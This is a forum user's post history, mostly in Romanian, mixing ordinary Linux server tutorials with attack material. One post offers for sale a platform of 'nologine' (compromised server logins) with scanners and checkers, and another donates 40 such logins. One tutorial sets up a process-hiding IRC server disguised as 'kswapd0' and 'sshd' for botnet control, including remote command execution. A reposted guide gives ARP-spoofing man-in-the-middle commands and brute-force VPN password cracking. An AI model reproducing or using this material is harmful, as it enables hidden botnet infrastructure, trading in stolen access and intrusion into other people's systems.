-
Posts
224 -
Joined
-
Last visited
Everything posted by ilbr22
-
MrRip accept oferta ta si sunt deacord cu chestia asta. HoWn3r iti voi oferi suport timp de o saptamana ca sa te familiarizezi cu tot ce inseamna platforma. Ne auzim pe mess mai tarziu umpic. Multumesc
-
Nu am cum, imi pare rau. Cel mai probabil HoWn3r o sa detina site-ul deci cu el va trebuii sa discuti.
-
Salut. Sunt de acord sa facem schimbul printr-un admin. Da-mi add sa-ti arat cum sta treaba cu site-ul si cam cum se administreaza, o sa iti explic pe privat cam care sunt gaurile si la ce mai trebuie lucrat. Cred ca designul este primul care trebuie schimbat. Cedez inclusiv servere ( adica 5 vps-uri si un dedicat ) .
-
da-mi un pm cu contactu si stam de vb sau ma gasesti la ilbr22@default.rs jabber
-
M-am decis sa vand platforma de nologine ipsocks[.]pro / unlimited-socks[.]com cu tot cu domenii, clienti lista de nologine scannere/checkere etc. Bonus ( socksdb[com]) cu tot cu platforma de socks-uri, trebuie imbunatatita si asta + sursa socks . Pur si simplu nu mai am timp sa ma ocup de acest site si am nevoie foarte repede de bani.(probleme personale) Cerinte: ( ce trebuie sa indeplineasca cel ce vrea sa cumpere/preia acest site ? ) 1. Sa imbunatateasca platforma ( aceasta nu face fata la userii actuali ) 2. Sa imbunataseasca functiile ( sunt scrise majoritatea la misto si au ceva bug-uri ) 3. Sa demonstreze ca are bani si ca vrea sa aduca munca la un alt nivel. Date despre userii inregistrati si platile lor le voi da doar cui consider eu ca merita sau potentialilor clienti, nu oricui. Imi rezerv dreptul de a alege potentialul cumparator, prefer sa se aleaga praful de munca mea decat sa o vand cuiva si sa isi bata el joc de ea. INSIST sa nu faceti offtopic, daca nu te intereseaza nu te baga in discutie . Pret: 2500 usd - usor negociabil. Astept ofertele voastre in pm.
-
as vrea sa vad niste exemple... cu ceva explicatii. multumesc
-
sau ceva mult mai simplu cat ftp.sh #!/bin/bash ftp -inv $1<<ENDFTP user $2 $3 put $4 bye ENDFTP sh ftp.sh ftp.rstcenter.com user pass fisier
-
#!/bin/sh # Backup Baze de date MySQL b_dir="/usr/BACKUP/" log_dir="/var/log/backup/" MySQL_db_dir="/usr/local/mysql/var/" MySQK_bk_user="userul de backup" MySQL_bk_pw="Parola pentru userul de backup" mkdir $b_dir`date +"%d%b%y"` mkdir $b_dir`date +"%d%b%y"`/mysql/ # MySQL for i in `ls $MySQL_db_dir | sed -e 's/\///'` ; do if [ -d $MySQL_db_dir$i ] ; then cd $b_dir`date +"%d%b%y"`/mysql/ /usr/bin/mysqldump $i -u $MySQL_bk_user -p"$MySQL_bk_pw" > $i-`date +"%d%b%y"`.sql tar cjf $i-`date +"%d%b%y"`.sql.tar.bz2 $i-`date +"%d%b%y"`.sql rm -rf $i-`date +"%d%b%y"`.sql fi done sursa: www[.]linux-tutorial[.]eu
-
Presupun ca majoritate celor ce inca folosesc ircdul fara servicii folosesc unreal sau bircd. M-am hotarat sa explic si sa public o alta varianta de unreal modata, folosita foarte des pentru botnet. Acesta arhiva de ircd ascunde procesul serverului si are multe facilitati care te vor avantaja daca vrei sa te ascunzi cat de cat de oamenii nepoftiti. Nu este o arhiva pentru ircdurile publice. In primul rand vrem sa scoatem limita serverului: echo "* hard nofile 99999" >> /etc/security/limits.conf echo "* soft nofile 99999" >> /etc/security/limits.conf sed -i 's/1024/99999/g' /usr/include/bits/typesizes.h ulimit -n 99999 Instalam gcc, make si openssl apt-get install gcc make openssl -y yum install gcc make openssl -y Punem pe server arhiva. Link: Download Swap for Free | 1gb File Hosting with amazing speed! Dezarhivam: tar xvf swal.l.tar.gz && rm -rf swap.l.tar.gz && cd swap.l Configuram serverul: ./Config O sa arate cam asa: Many older operating systems have an insecure TCP/IP stack which may be vulnerable to IP spoofing attacks, if you run an operating system that is vulnerable to such attacks enable this option. This option can also be useful to prevent blind proxies from connecting (eg: HTTP POST proxies). Do you want to enable the server anti-spoof protection? [No] -> What directory are all the server configuration files in? [/root/swap.l] -> What is the path to the ircd binary including the name of the binary? [/root/swap.l/src/kswapd0] -> Would you like to compile as a hub or as a leaf? Type Hub to select hub and Leaf to select leaf. [Hub] -> What is the hostname of the server running your IRCd? [li317-115] -> What should the default permissions for your configuration files be? (Set this to 0 to disable) It is strongly recommended that you use 0600 to prevent unwanted reading of the file [0600] -> Do you want to support SSL (Secure Sockets Layer) connections? [No] -> Do you want to enable IPv6 support? [No] -> Do you want to enable ziplinks support? [No] -> Do you want to enable remote includes? [No] -> Do you want to enable prefixes for chanadmin and chanowner? This will give +a the & prefix and ~ for +q (just like +o is @) Supported by the major clients (mIRC, xchat, epic, eggdrop, Klient, PJIRC, irssi, CGI:IRC, etc.) This feature should be enabled/disabled network-wide. [Yes] -> What listen() backlog value do you wish to use? Some older servers have problems with more than 5, others work fine with many more. [5] -> How far back do you want to keep the nickname history? [100] -> What is the maximum sendq length you wish to have? [99939900] -> How many buffer pools would you like? This number will be multiplied by MAXSENDQLENGTH. [18] -> How many file descriptors (or sockets) can the IRCd use? [99999] -> Would you like any more parameters to configure? Write them here: []-> Puteti configura serverul dupa bunul plac, eu am ales sa fac tutorialul cu setarile default. Asteptam pana ne apare: __________________________________________________ | make | |__________________________________________________| Dupa ce termina dam urmatoarea comanda: make Asteptam pana ne apare: __________________________________________________ | Done | |__________________________________________________| Acum serverul de ircd este instalat, stergem fisierele care nu ne mai trebuiesc: ./delc Configuram serverul: nano httpweb.so Stergem tot si adaugam urmatorul config: loadmodule "src/modules/commands.so"; loadmodule "src/modules/cloak.so"; me { info "psyBNC2.6.4"; }; admin { "*"; }; class clients { pingfreq 120; maxclients 16000; sendq 1505990000; recvq 32100; }; class servers { pingfreq 120; maxclients 500; sendq 1505990000; connfreq 513; }; class opers { pingfreq 120; maxclients 35; sendq 1505990000; recvq 32100; }; allow { ip *@*; hostname *@*; class clients; # optional # password "ParolaLaConnectareaPeServer"; # maxperip 1; }; oper UserIrcop { class clients; from { userhost *@*; }; password "ParolaIrcop"; flags "OaArDRhwgcLkKbZtBnGNzWHvqdX^"; snomask "kcfjveGnNqSso"; maxlogins 10; }; listen *:6667; listen *:7333 { options { ssl; }; }; ulines { hub.*; }; drpass { restart "ParolaPentruRestart"; die "ParolaPentruDie"; }; set { network-name "psyBNC2.6.4"; default-server "0"; services-server "0"; stats-server "0"; hiddenhost-prefix "x"; cloak-keys { BEfg79f8dsgDF7fdgFDG79s; 0309FDGD2jhksdfuiE8943h; dESDf890f8X7fds9SEFwf8j; }; hosts { local "psyBNC"; global "psyBNC"; coadmin "psyBNC"; admin "psyBNC"; servicesadmin "psyBNC"; netadmin "psyBNC"; host-on-oper-up "no"; }; help-channel "0"; modes-on-connect "0"; modes-on-oper "+xwigsv-B"; snomask-on-oper "+kejGq"; modes-on-join "+Mmntsu"; restrict-usermodes "BRxpwsg"; restrict-channelmodes "munts"; dns { nameserver 127.0.0.1; timeout 2s; retries 3; }; options { hide-ulines; }; default-bantime 10d; maxchannelsperuser 35; oper-only-stats "*"; throttle { connections 127; period 1s; }; ssl { certificate "server.cert.pem"; key "server.key.pem"; }; }; link hub.* { username *; hostname *; bind-ip *; port 8085; hub *; class servers; }; Pornim serverul: ./swap Daca totul a descurs normal ar trebuii sa apara ceva de genul acesta: v3.2.8.1-m0d-11311 using TRE 0.7.5 (LGPL) [warning] httpweb.so:96: listen with SSL flag enabled on a non SSL compile * Configuration loaded without any problems .. * Dynamic configuration initialized .. booting IRCd. * fprocess: /usr/sbin/sshd --------------------------------------------------------------------- Tocmai am terminat de instalat serverul de ircd. Comenzi in mirc: /server localhost:port Localhost fiind ip-ul serverului tau. La connectare o sa apara: * Connecting to localhost (6667) - x!w@localhost - Login: - * x sets mode: +iwx - Local host: 127.0.0.1 (localhost) Nelogandu-te la server nu vei putea accesa / vedea absolut nimic din ceea ce se intampla pe server. Comanda pentru logare ca ircop: /oper UserIrcop ParolaIrcop Dupa logare o sa apara: * x sets mode: +oghaAsNWv - Server notice mask (+kcfjveGnNqSso) - You are now an IRC Operator - -hub.24451.net- *** You are Oper on UFO Ship - Atentie: Atunci cand intrati pe un canal folositi urmatoarele comenzi: /join #canal /op Nick #canal /names #canal Nick este nickname-ul cu care te-ai connectat la server, daca nu esti sigur de el da-i urmatoarea comanda: //whois $me Daca nu vei da comenzile de mai sus fi sigur ca nu o sa vezi absolut nimic pe canalul respectiv. Tutorialul imi apartine 100% . Arhiva nu este facuta de mine, din cate stiu nu are nici un fel de backdoor in ea. Ceva misto: puteti controla serverul pe care arhiva e instalata prin mirc cu urmatoarea comanda (este posbil doar daca sunteti ircop) /exec :uname -a Imi cer scuze pentru posibilele greseli gramaticale sau incapacitatea de a formula cum se cuvine explicatiile pe care am vrut sa le aduc.
- 3 replies
-
- comenzi mirc
- ircd linux
-
(and 2 more)
Tagged with:
-
Deseori ne confruntam cu necesitatea utilizarii unui server FTP. Fie ca avem nevoie sa uploadam/downloadam fisiere personale, fie ca avem nevoie sa instalam o solutie FTP pe un server pentru clienti, notiunea de FTP ne este foarte familiara. Fiind un subiect atat de simplu de inteles nu cred ca ar avea rost sa descriu avantajele sau dezavantajele utilizarii FTP precum nici vreun istoric in care sa va plictisesc sau poate vreo statistica la nivel world wide privind utilizarea solutiei FTP. Tocmai de acea am sa trec direct la subiect. Pe Linux sunt destule alternative atunci cand vorbim despre servere FTP, insa eu am ales in aceasta prezentare solutia oferita de catre Vsftpd. Instalarea, configurarea sunt simple si intuitive. Consider aceasta metoda ca facand parte din familia solutiilor “instaleaza si uita” sau “it just works”. Trecem la instalarea serverului tastand in terminal comanda: sudo apt-get install vsftpd Confirmam instalarea apasand “y“, urmand apoi sa asteptam terminarea acesteia. Dupa terminarea instalarii serverul este deja functional, insa cu siguranta dorim sa modificam anumite setari. Aceste setari le putem gasi in fisierul de configurare vsftpd.conf. Tastam in terminal comanda pentru editarea fisierului: sudo gedit /etc/vsftpd.conf Odata ce fisierul este deschis, obervam optiunile si diferitele setari disponibile. Unele dintre ele sunt comentate, deci deducem ca ele sunt inactive. De aici tine de fiecare ce configurare doreste la serverul sau. In cazul in care doriti cea mai sigura solutie pentru configurarea acestuia va sfatuiesc sa studiati fiecare optiune in parte si sa cautati detalii suplimentare pentru rolul fiecarei optiuni prezente in fisierul respectiv. De exemplu, o setare foarte folositoare este schimbarea document rootului serverului. Acesta se poate schimba introducand la sfarsitul fisierului, spre exemplu (daca vrem sa setam in /var/www): #setare schimbare Doc Root local_root=/var/www Dupa efectuarea schimbarilor necesare trebuie sa-l restartam pentru ca acestea sa devina active. Comenzile pentru starea serverului sunt: sudo service vsftpd start sudo service vsftpd stop sudo service vsftpd restart Obs. In video am prezentat solutia alternativa prin folosirea unui modul de webmin. Pentru testarea vsftpd putem sa folosim un client gen Filezilla sau eventual sa introducem in terminal comanda: netstat -a | grep ftp In cazul in care outputul este ca cel de jos mai jos atunci totul este ok. tcp 0 0 *:ftp * LISTEN Vsftpd este cea mai simpla solutie pentru instalarea unui server FTP pe Ubuntu si dupa parerea mea nici nu e nevoie de ceva mai complex atata timp cat discutam de partajarea fisierelor prin FTP. Video: Sursa: ubuntutorials[.]ro
-
- cum instalez vsfpd
- install vsfpd
-
(and 3 more)
Tagged with:
-
cum imi faci si eu cont? am observat ca inregistrarile sunt inchise
-
l-a incercat cineva ? vreau si eu un ip vuln. ms
-
Links Watch on-line: Watch Cracking VPNs (asleap and THC-pptp-bruter) | g0tmi1k Episodes | Blip Download Video: asleap _ THC-pptp-bruter.mp4 Script (chap2asleap.py): Free Cloud Storage - MediaFire What is this? A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program. This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN. How does this work? From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break theses values down: CHAP Challenge = Auth Challenge (16 bytes) CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes) After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1)the result. This will generate the "Challenge". Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge. This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either uses a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments. What do I need? > asleap > Python > The script - chap2asleap.py > Wireshark > VPN > THC-pptp-bruter Software Name: asleap Version: 2.2 Home Page: asleap - exploiting cisco leap Download Link: http://www.willhackforsushi.com/code...asleap-2.2.tgz Name: THC-pptp-bruter Version: 0.1.4 Home Page: #!/bin/the hacker's choice - THC Download Link: http://freeworld.thc.org/download.ph...r-0.1.4.tar.gz Name: chap2asleap.py Version: 0.1.1 Home Page: g0tmi1k Download Link: Free Cloud Storage - MediaFire How to use chap2asleap.py: 1.) chmod 755 chap2asleap.py 2.) python chap2asleap.py Commands: echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth1 -t 10.0.0.3 10.0.0.9 arpspoof -i eth1 -t 10.0.0.9 10.0.0.3 wireshark -i eth1 -k python chap2asleap.py python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c 4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v cd /pentest/passwords/wordlists cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3 Notes: Song: Two Fingers - Keman Rhythm Video length: 03:03 Capture length: 5:48 Blog Post: http://g0tmi1k.blogspot.com/2010/03/...2asleappy.html Forum Post: http://www.backtrack-linux.org/forum....html#post7959 source: Cracking VPNs (asleap and THC-pptp-bruter)
-
de curiozitate, ce tipuri de plata acceptati ? LR / paypal / wu / card ? as fi interesat sa cumpar mi-ar convenii foarte mult o plata prin lr
-
In this tutorial I will compile the latest NginX (1.3.6) and PHP (5.4.7) with FPM, MySQL and APC (3.1.13) on Ubuntu Precise (12.04). For the moment, Suhosin 0.9.33 is not working with PHP 5.4.x. Apart for some version numbers for some dependencies, all the steps should be the similar for Ubuntu Lucid, Maverick, Natty and Oneiric. I will not explain how to configure NginX here. You can find a lot of resources about that on the nginx wiki. In order to compile these programs you will need the following dependencies (most of them should already be installed): sudo apt-get install htop vim-nox binutils cpp flex gcc libarchive-zip-perl libc6-dev m4 libpcre3 libpcre3-dev libssl-dev libpopt-dev lynx make perl perl-modules openssl unzip zip autoconf2.13 gnu-standards automake libtool bison build-essential zlib1g-dev ntp ntpdate autotools-dev g++ bc subversion psmisc re2c And also some libraries for PHP: sudo apt-get install libmysqlclient-dev mysql-client libcurl4-openssl-dev libgd2-xpm-dev libjpeg-dev libpng3-dev libxpm-dev libfreetype6-dev libt1-dev libmcrypt-dev libxslt1-dev bzip2 libbz2-dev libxml2-dev libevent-dev libltdl-dev libmagickwand-dev libmagickcore-dev imagemagick libreadline-dev libc-client-dev libsnmp-dev snmpd snmp libpq-dev Now let's create a folder in which we can play: mkdir ~/lemp && cd ~/lemp and start downloading the sources: wget http://nginx.org/download/nginx-1.3.6.tar.gz wget http://us.php.net/distributions/php-5.4.7.tar.gz wget http://pecl.php.net/get/APC-3.1.13.tgz You can visit each site in order to find faster mirrors. Now decompress them: tar zxvf nginx-1.3.6.tar.gz tar xzvf php-5.4.7.tar.gz tar xzvf APC-3.1.13.tgz And now let's install them one by one. I like to put everything I compile by myself in one place, the /opt directory. By doing this I know where to find things like configuration files and libraries. cd nginx-1.3.6/ ./configure \ --prefix=/opt/nginx \ --conf-path=/etc/nginx/nginx.conf \ --pid-path=/var/run/nginx.pid \ --lock-path=/var/lock/nginx.lock \ --http-log-path=/var/log/nginx/access.log \ --error-log-path=/var/log/nginx/error.log \ --http-client-body-temp-path=/var/lib/nginx/body \ --http-proxy-temp-path=/var/lib/nginx/proxy \ --http-fastcgi-temp-path=/var/lib/nginx/fastcgi \ --http-uwsgi-temp-path=/var/lib/nginx/uwsgi \ --http-scgi-temp-path=/var/lib/nginx/scgi \ --with-http_stub_status_module \ --with-http_ssl_module \ --with-http_realip_module \ --with-http_gzip_static_module \ --user=www-data \ --group=www-data \ --without-mail_pop3_module \ --without-mail_imap_module \ --without-mail_smtp_module make sudo make install cd .. sudo wget -O /etc/init.d/nginx https://github.com/vladgh/VladGh.com-LEMP/raw/master/init_files/nginx sudo chmod +x /etc/init.d/nginx sudo update-rc.d -f nginx defaults sudo mkdir -p /var/lib/nginx/{body,proxy,fastcgi,uwsgi,scgi} You sould also create the file /etc/logrotate.d/nginx in order to compress the logs. sudo sh -c "echo '/var/log/nginx/*.log { weekly missingok rotate 52 compress delaycompress notifempty create 640 root adm sharedscripts postrotate [ ! -f /var/run/nginx.pid ] || kill -USR1 \`cat /var/run/nginx.pid\` endscript }' > /etc/logrotate.d/nginx" You can also find a very simple configuration for nginx at https://github.com/vladgh/VladGh.com/blob/master/nginx.conf, but I strongly recommend to use the Nginx Configuration page Starting with Ubuntu 11.04 the canonical team modified the path for some libraries so you might need to run the following set of commands in order to get the PHP compilation to work: arch=$(dpkg-architecture -qDEB_HOST_MULTIARCH) [ -f /usr/lib/${arch}/libjpeg.so ] && sudo ln -s /usr/lib/${arch}/libjpeg.so /usr/lib/ [ -f /usr/lib/${arch}/libpng.so ] && sudo ln -s /usr/lib/${arch}/libpng.so /usr/lib/ [ -f /usr/lib/${arch}/libXpm.so ] && sudo ln -s /usr/lib/${arch}/libXpm.so /usr/lib/ [ -f /usr/lib/${arch}/libmysqlclient.so ] && sudo ln -s /usr/lib/${arch}/libmysqlclient.so /usr/lib/ [ -d /usr/lib/i386-linux-gnu/mit-krb5 ] && sudo ln -s /usr/lib/${arch}/mit-krb5/lib*.so /usr/lib/ Now let's compile the PHP packages: sudo mkdir /var/www sudo chown -R www-data:www-data /var/www cd php-5.4.7 ./buildconf --force ./configure \ --prefix=/opt/php5 \ --with-config-file-path=/etc/php5 \ --with-config-file-scan-dir=/etc/php5/conf.d \ --with-curl \ --with-pear \ --with-gd \ --with-jpeg-dir \ --with-png-dir \ --with-zlib \ --with-xpm-dir \ --with-freetype-dir \ --with-t1lib \ --with-mcrypt \ --with-mhash \ --with-mysql \ --with-mysqli \ --with-pgsql \ --with-pdo-mysql \ --with-pdo-pgsql \ --with-openssl \ --with-xmlrpc \ --with-xsl \ --with-bz2 \ --with-gettext \ --with-readline \ --with-fpm-user=www-data \ --with-fpm-group=www-data \ --with-imap \ --with-imap-ssl \ --with-kerberos \ --with-snmp \ --disable-debug \ --enable-fpm \ --enable-cli \ --enable-inline-optimization \ --enable-exif \ --enable-wddx \ --enable-zip \ --enable-bcmath \ --enable-calendar \ --enable-ftp \ --enable-mbstring \ --enable-soap \ --enable-sockets \ --enable-shmop \ --enable-dba \ --enable-sysvsem \ --enable-sysvshm \ --enable-sysvmsg make sudo make install The next step is to configure PHP-FPM: sudo mkdir /var/log/php-fpm sudo mkdir -p /etc/php5/conf.d sudo chown -R www-data:www-data /var/log/php-fpm sudo cp -f php.ini-production /etc/php5/php.ini sudo chmod 644 /etc/php5/php.ini sudo cp -f /opt/php5/etc/php-fpm.conf.default /etc/php5/php-fpm.conf sudo cp -f /opt/php5/etc/pear.conf /etc/php5/pear.conf sudo cp -f sapi/fpm/init.d.php-fpm /etc/init.d/php-fpm sudo chmod +x /etc/init.d/php-fpm sudo update-rc.d -f php-fpm defaults We should also modify the init file and the configuration file for PHP with the standard path for the pid file (/var/run): sudo sed -i".bak" "s/php_fpm_CONF=.*/php_fpm_CONF=\/etc\/php5\/php-fpm.conf/" /etc/init.d/php-fpm sudo sed -i "s/php_fpm_PID=.*/php_fpm_PID=\/var\/run\/php-fpm.pid/" /etc/init.d/php-fpm sudo sed -i".bak" "s/;pid = .*/pid = \/var\/run\/php-fpm.pid/" /etc/php5/php-fpm.conf You can make the desired modifications to /etc/php5/php-fpm.conf file. This is were you can setup the server to listen on a socket or TCP port, or you can adjust how many processes you want. The file is very well documented in the comments. A sample conf file can be found here. The newer versions of php complain if a time zone is not set on php.ini (so we grab the system's one) TIMEZONE=$([ -f /etc/timezone ] && cat /etc/timezone | sed "s/\//\\\\\//g") sudo sed -i".bak" "s/^\;date\.timezone.*$/date\.timezone = \"${TIMEZONE}\" /g" /etc/php5/php.ini Create the logrotate file for PHP with the following command: sudo sh -c "echo '/var/log/php-fpm/*.log { weekly missingok rotate 52 compress delaycompress notifempty create 640 www-data www-data sharedscripts postrotate [ ! -f /var/run/php-fpm.pid ] || kill -USR1 \`cat /var/run/php-fpm.pid\` endscript }' > /etc/logrotate.d/php-fpm" Because the executables for both PHP and NginX are not in a standard location you can add the following lines to /etc/environment so that the new path is always loaded: export PATH="/opt/php5/bin:/opt/php5/sbin:/opt/nginx/sbin:$PATH" sudo sh -c "echo \"PATH=\"$PATH\"\" > /etc/environment" Now you should be able to see the version numbers for NginX and PHP: nginx -V php -v And also the location of the executables: which nginx which php Now let's install the latest APC: cd ../APC-3.1.13 /opt/php5/bin/phpize -clean ./configure --enable-apc --with-php-config=/opt/php5/bin/php-config --with-libdir=/opt/php5/lib/php make sudo make install You will have to add the extension in php.ini sudo sh -c "echo 'extension = apc.so apc.enabled = 1 apc.shm_size = 128M apc.shm_segments=1 apc.write_lock = 1 apc.rfc1867 = On apc.ttl=7200 apc.user_ttl=7200 apc.num_files_hint=1024 apc.mmap_file_mask=/tmp/apc.XXXXXX apc.enable_cli=1 ; Optional, for \"[apc-warning] Potential cache slam averted for key... errors\" ; apc.slam_defense = Off' > /etc/php5/conf.d/apc.ini" This is it! You can now start the servers: sudo /etc/init.d/php-fpm start sudo /etc/init.d/nginx start If you want a MySQL server installed you can run the following command. apt-get install mysql-server mysql-client This should be enough to get MySQL up and running. If you have a separate database somewhere you can only install the mysql-client package. For additional config parameters look into the /usr/share/doc/mysql-server-5.1/examples folder and you will find a few configurations. You can also get the MySQLTuner.pl script which will give a lot more information on how to fine tune your mysql server: wget mysqltuner.pl You should now have a fully functional LEMP platform. An unattended script that installs everything can be found at GitHub. Check the README file for instructions on how to run the installer. source { copy / paste } - vladgh[.]com
-
cu aptitude faci inclusiv config, nu doar install.
-
Stiu, si mie mi s-a parut mult mai bun fpm-ul, o sa postez mai pe seara un tutorial care pentru mine a functionat in engleza. Sau puteti citii aici: https://rstcenter.com/forum/59628-install-nginx-php-php-fpm-mysql-apc.rst
-
am uitat sa precizez ca este vorba de un proxy server care este un dedicat, deci pot da orice comanda iptables, am si ufw instalat. Edit: la script bash adaugat in cron m-am gandit si eu prima oara, dar fiind logul foooarte mare statea o vesnicie sau se bloca sau ... sau .. numa idiotenii, nu mi s-a parut deloc rentabil, probabil fiind putin obosit l-am scris putin anapoda sau nu am abordat foarte bine problema . Multumesc pentru link-uri ma voi uita sa vad ce pot face. Sfaturile unui om batran, multumesc ca ti-ai facut timp sa-mi explici anumite lucruri. Edit2: Un alt firewall care mi s-a parut bunicel: IPT="/sbin/iptables" echo "Starting IPv4 Wall..." $IPT -F $IPT -X $IPT -t nat -F $IPT -t nat -X $IPT -t mangle -F $IPT -t mangle -X echo "1" > /proc/sys/net/ipv4/tcp_syncookies echo "1" > /proc/sys/net/ipv4/conf/all/rp_filter echo "0" > /proc/sys/net/ipv4/conf/all/accept_source_route echo "1" > /proc/sys/net/ipv4/conf/all/secure_redirects echo "1" > /proc/sys/net/ipv4/conf/all/log_martians PUB_IF="eth0" $IPT -A INPUT -i lo -j ACCEPT $IPT -A OUTPUT -o lo -j ACCEPT $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Syn" $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -j DROP $IPT -A INPUT -p tcp -i venet0 -m state --state NEW -m recent --set $IPT -A INPUT -p tcp -i venet0 -m state --state NEW -m recent --update --seconds 3 --hitcount 20 -j DROP $IPT -A FORWARD -p tcp -i venet0 -m state --state NEW -m recent --set $IPT -A FORWARD -p tcp -i venet0 -m state --state NEW -m recent --update --seconds 3 --hitcount 20 -j DROP $IPT -A INPUT -i ${PUB_IF} -f -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets" $IPT -A INPUT -i ${PUB_IF} -f -j DROP $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets" $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets" $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #XMAS $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan" $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP $IPT -A INPUT -i venet0 -m state --state ESTABLISHED,RELATED -j ACCEPT $IPT -A OUTPUT -o venet0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT $IPT -A INPUT -p tcp --destination-port 20000 -j ACCEPT $IPT -A OUTPUT -p tcp --sport 20000 -j ACCEPT $IPT -A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT $IPT -A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT $IPT -A INPUT -j LOG $IPT -A FORWARD -j LOG Ce parere ai ? Edit3: Asta am incercat sa fac, dar m-a persat foarte mult timpul si nu am avut timp de teste plus ca a fost si problema diferentelor dintre vps si dedicat. Acum citind manualul mi se pare mult mai usor si incepe sa prinda logica ceea ce vreau sa fac, multumesc inca o data pentru timpul acordat...m-ai scos din cacat. Raman dator. Ps: O sa incerc sa vin si eu cu detalii in combaterea ddos-ului/flood-ului pentru cei ce au nelamuriri.
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
scuze dublu post . Se da urmatorul log. Cum fac sa banez automat din iptables ip-ul care trece de limitrate sau perip ?
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
In primul rand, nu ma mai bagati pe mine la misloc in discutiile voastre de tot cacatul, e alegerea omului, fiecare face ce vrea. Donez si eu 40 nologine . Toate de us.
-
Da este openvz, dupa ce am citit si eu mai mult mi-am ales si vps-u prost... o sa trec pe xen sper ca acolo sa nu mai fiu atat de limitat. Edit: multumesc.
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Nu am asa ceva. In schimb am scapat de modul proxy cu apache. M-am chinuit 2 zile si am instalat intr-un final nginx cu fastphp si fast cgi, se simte, e alta diferenta. Intrebarea mea ar fi urmatoarea se poate instala xt_string.ko pe vps-ul meu ? sau ii pot face ceva ca functia iptables sa functioneze conform cerintelor Si as mai avea o rugaminte, legat de firewall-ul care l-am postat in primul post, imi poti da mura-n gura cu adaptarile necesare la ceea ce am eu acum si cu o explicate mai pentru prosti sa pot intelege si eu ? Astea ar fi porturile. 22/tcp open ssh 25/tcp open smtp 80/tcp open http 587/tcp open submission 3306/tcp open mysql 9000/tcp open cslistener 9000 este de la fastphp/fast cgi 587 habar nu am ce este, asa a venit os-ul cu el. Si daca se poate orice pachete udp/syn sa nu fie acceptate. Multumesc mult tex pentru timpul acordat.
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Cam cum ar arata un 404 in nginx ? server { listen 80; error_page 404 = http://www.google.de; } Sau sa adopt a doua varianta cu: server { location / { error_page 404 = @try_server2; } location @try_server2 { proxy_pass http://www.google.de; } Care ar fi cea mai buna solutie de filtrare? ============================================ Edit: Cum pot fixa ? iptables -I INPUT -p tcp --dport 80 -m string --string "29602" --algo bm -j REJECT --reject-with tcp-reset iptables: No chain/target/match by that name. Se pare ca a schimbat si metoda de flood: 173.245.53.136 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 29602 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)" 173.245.53.136 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 29602 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)" 173.245.53.136 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 17169 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)" 173.245.53.136 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 29602 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)" 173.245.53.72 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 29602 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)" 173.245.53.119 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 29602 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)" 173.245.53.136 - - [24/Sep/2012:23:54:32 +0400] "GET / HTTP/1.0" 200 29602 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)"
- 25 replies
-
- atacuri ddos
